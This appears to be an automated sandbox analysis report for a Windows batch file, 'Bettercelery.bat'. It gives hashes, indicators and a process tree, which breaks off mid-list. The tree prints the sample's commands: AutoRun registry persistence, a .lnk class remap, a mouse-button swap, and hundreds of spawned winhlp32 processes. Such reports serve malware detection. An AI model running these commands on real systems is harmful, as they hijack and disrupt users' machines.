ef5562a3888f33d8de016b029f2baa7db6a094ec24e17a95eef47d3a7ecc1cab

Analysis

max time kernel
30s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
15/07/2024, 07:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bettercelery.bat
Size

1KB
MD5

df2facada7cbea4b1917fd7a52237e99
SHA1

64a7c8f6a8bbd2ec21ab836ac25dc9885d38ee8c
SHA256

ef5562a3888f33d8de016b029f2baa7db6a094ec24e17a95eef47d3a7ecc1cab
SHA512

debb1d705972f0044e1807bf470beef8ffd1f054a96215ee0db8a649b96981df0bb560e8ac32537e72454ba5a78063805f3a3787c6e954aaf4cf93606769a846

Score

5^/10

Malware Config

Signatures

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File created	C:\Windows\system32\batinit.bat	cmd.exe

Program crash 5 IoCs

pid	pid_target	Process	procid_target
43304	33752	Process not Found	1714
43848	35572	Process not Found	1814
43976	36804	Process not Found	1871
36620	41188	Process not Found	2054
36624	41044	Process not Found	2044

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 10 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe

Modifies registry key 1 TTPs 7 IoCs

Modify Registry

T1112

pid	Process
2288	reg.exe
4284	reg.exe
4988	reg.exe
7984	reg.exe
9860	reg.exe
10136	reg.exe
10284	reg.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
5624	msedge.exe
5624	msedge.exe
5612	msedge.exe
5612	msedge.exe
6340	msedge.exe
6340	msedge.exe
5196	msedge.exe
5196	msedge.exe
7156	msedge.exe
7156	msedge.exe
9624	msedge.exe
9624	msedge.exe
14056	msedge.exe
14056	msedge.exe
9820	msedge.exe
9820	msedge.exe
12596	msedge.exe
12596	msedge.exe
9688	msedge.exe
9688	msedge.exe
11724	msedge.exe
11724	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

pid	Process
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
1620	helppane.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
7236	helppane.exe
5196	msedge.exe
9620	helppane.exe
10704	helppane.exe
13436	helppane.exe
11632	helppane.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe
5196	msedge.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1620	helppane.exe
1620	helppane.exe
7236	helppane.exe
7236	helppane.exe
9620	helppane.exe
9620	helppane.exe
10704	helppane.exe
10704	helppane.exe
13436	helppane.exe
13436	helppane.exe
11632	helppane.exe
11632	helppane.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1580 wrote to memory of 3116	1580	cmd.exe	85
PID 1580 wrote to memory of 3116	1580	cmd.exe	85
PID 1580 wrote to memory of 4512	1580	cmd.exe	150
PID 1580 wrote to memory of 4512	1580	cmd.exe	150
PID 1580 wrote to memory of 2232	1580	cmd.exe	88
PID 1580 wrote to memory of 2232	1580	cmd.exe	88
PID 1580 wrote to memory of 4492	1580	cmd.exe	89
PID 1580 wrote to memory of 4492	1580	cmd.exe	89
PID 3116 wrote to memory of 1096	3116	cmd.exe	90
PID 3116 wrote to memory of 1096	3116	cmd.exe	90
PID 3116 wrote to memory of 4320	3116	cmd.exe	92
PID 3116 wrote to memory of 4320	3116	cmd.exe	92
PID 3116 wrote to memory of 4308	3116	cmd.exe	93
PID 3116 wrote to memory of 4308	3116	cmd.exe	93
PID 1580 wrote to memory of 2288	1580	cmd.exe	94
PID 1580 wrote to memory of 2288	1580	cmd.exe	94
PID 3116 wrote to memory of 5088	3116	cmd.exe	95
PID 3116 wrote to memory of 5088	3116	cmd.exe	95
PID 1580 wrote to memory of 396	1580	cmd.exe	96
PID 1580 wrote to memory of 396	1580	cmd.exe	96
PID 3116 wrote to memory of 4284	3116	cmd.exe	97
PID 3116 wrote to memory of 4284	3116	cmd.exe	97
PID 3116 wrote to memory of 3928	3116	cmd.exe	158
PID 3116 wrote to memory of 3928	3116	cmd.exe	158
PID 1580 wrote to memory of 4500	1580	cmd.exe	99
PID 1580 wrote to memory of 4500	1580	cmd.exe	99
PID 1096 wrote to memory of 3076	1096	cmd.exe	100
PID 1096 wrote to memory of 3076	1096	cmd.exe	100
PID 1580 wrote to memory of 4456	1580	cmd.exe	102
PID 1580 wrote to memory of 4456	1580	cmd.exe	102
PID 1580 wrote to memory of 4456	1580	cmd.exe	102
PID 1096 wrote to memory of 1020	1096	cmd.exe	103
PID 1096 wrote to memory of 1020	1096	cmd.exe	103
PID 1580 wrote to memory of 1168	1580	cmd.exe	104
PID 1580 wrote to memory of 1168	1580	cmd.exe	104
PID 1580 wrote to memory of 1168	1580	cmd.exe	104
PID 1580 wrote to memory of 4152	1580	cmd.exe	105
PID 1580 wrote to memory of 4152	1580	cmd.exe	105
PID 1580 wrote to memory of 4152	1580	cmd.exe	105
PID 1580 wrote to memory of 4520	1580	cmd.exe	233
PID 1580 wrote to memory of 4520	1580	cmd.exe	233
PID 1580 wrote to memory of 4520	1580	cmd.exe	233
PID 1580 wrote to memory of 4656	1580	cmd.exe	107
PID 1580 wrote to memory of 4656	1580	cmd.exe	107
PID 1580 wrote to memory of 4656	1580	cmd.exe	107
PID 1580 wrote to memory of 2488	1580	cmd.exe	108
PID 1580 wrote to memory of 2488	1580	cmd.exe	108
PID 1580 wrote to memory of 2488	1580	cmd.exe	108
PID 1580 wrote to memory of 424	1580	cmd.exe	109
PID 1580 wrote to memory of 424	1580	cmd.exe	109
PID 1580 wrote to memory of 424	1580	cmd.exe	109
PID 3116 wrote to memory of 4112	3116	cmd.exe	110
PID 3116 wrote to memory of 4112	3116	cmd.exe	110
PID 1580 wrote to memory of 3596	1580	cmd.exe	112
PID 1580 wrote to memory of 3596	1580	cmd.exe	112
PID 1580 wrote to memory of 3596	1580	cmd.exe	112
PID 1096 wrote to memory of 2716	1096	cmd.exe	113
PID 1096 wrote to memory of 2716	1096	cmd.exe	113
PID 1580 wrote to memory of 4640	1580	cmd.exe	114
PID 1580 wrote to memory of 4640	1580	cmd.exe	114
PID 1580 wrote to memory of 4640	1580	cmd.exe	114
PID 1580 wrote to memory of 1684	1580	cmd.exe	235
PID 1580 wrote to memory of 1684	1580	cmd.exe	235
PID 1580 wrote to memory of 1684	1580	cmd.exe	235

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Bettercelery.bat"
1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K Bettercelery.bat
  2⤵
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Bettercelery.bat
    3⤵
    - Drops file in System32 directory
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Bettercelery.bat
      4⤵
      Drops file in System32 directory
      Modifies registry class
      PID:3076
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Bettercelery.bat
        5⤵
        
        PID:6832
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Bettercelery.bat
        6⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:7660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Bettercelery.bat
        7⤵
        
        PID:7068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Bettercelery.bat
        8⤵
        
        PID:8396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Bettercelery.bat" /f
        8⤵
        
        PID:8684
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        8⤵
        
        PID:9508
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Sakpot.bat" /f
        8⤵
        
        PID:9412
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
        8⤵
        Modifies registry key
        
        PID:10136
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Bettercelery.bat" /f
        7⤵
        
        PID:8332
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        7⤵
        
        PID:9396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Sakpot.bat" /f
        7⤵
        
        PID:9500
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
        7⤵
        Modifies registry key
        
        PID:10284
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows/system32/rundll32 user32, SwapMouseButton
        7⤵
        
        PID:11956
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\system32\batinit.bat" /f
        7⤵
        
        PID:13516
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13992
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14004
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14012
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14028
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14040
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14080
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14092
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14104
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14116
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14128
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14140
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14176
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14184
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14196
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14204
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14316
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13348
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13328
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10784
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11220
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:8688
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9092
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12788
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12680
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10904
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10960
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11108
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:1848
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10584
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10668
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13520
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13548
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10552
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10548
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9572
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9388
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10028
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9776
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:7344
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:1048
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9820
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12108
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:2660
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12380
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10124
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9268
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:5396
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10388
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:2304
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:7780
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10712
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10384
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12624
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10596
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9528
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:8932
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:4788
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:5420
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:6984
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9440
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:884
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9356
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12976
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12304
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10228
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14320
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9024
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9428
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10236
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9724
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13080
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:4092
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14144
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14276
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14176
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11396
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:6572
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9348
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:5376
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10076
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12448
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10480
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9664
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10468
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11728
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12060
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:8060
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10032
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11332
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11140
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10384
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13168
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11276
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:6984
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13136
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13576
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:8124
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13896
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:5516
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:1444
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:7668
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:6284
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:5780
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13944
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13680
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12268
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9720
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9756
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12376
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:8648
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11000
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9980
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10064
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:7612
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:8232
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10208
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11224
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:4464
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12868
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9276
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13048
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10368
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10720
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:3468
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11176
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10796
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11392
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10336
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:4264
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12244
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11304
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10272
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:13792
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10440
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10948
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:5316
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10528
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10396
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:8480
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9352
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11720
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12164
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:8976
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11168
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:9620
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:10308
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12732
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11048
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:12532
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:5416
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11932
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:4788
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:5300
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11288
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:4900
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:11836
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14800
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14840
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14860
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14884
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14896
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14916
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14932
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14956
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:14984
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15004
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15016
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15028
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15036
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15048
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15060
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15072
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15084
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15096
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15108
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15124
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15132
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15140
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15148
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15160
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15168
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15184
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15196
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15216
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15232
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15252
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15264
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15280
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15288
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15300
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15324
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15332
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15344
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15364
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15380
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15396
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15408
        
        C:\Windows\winhlp32.exe
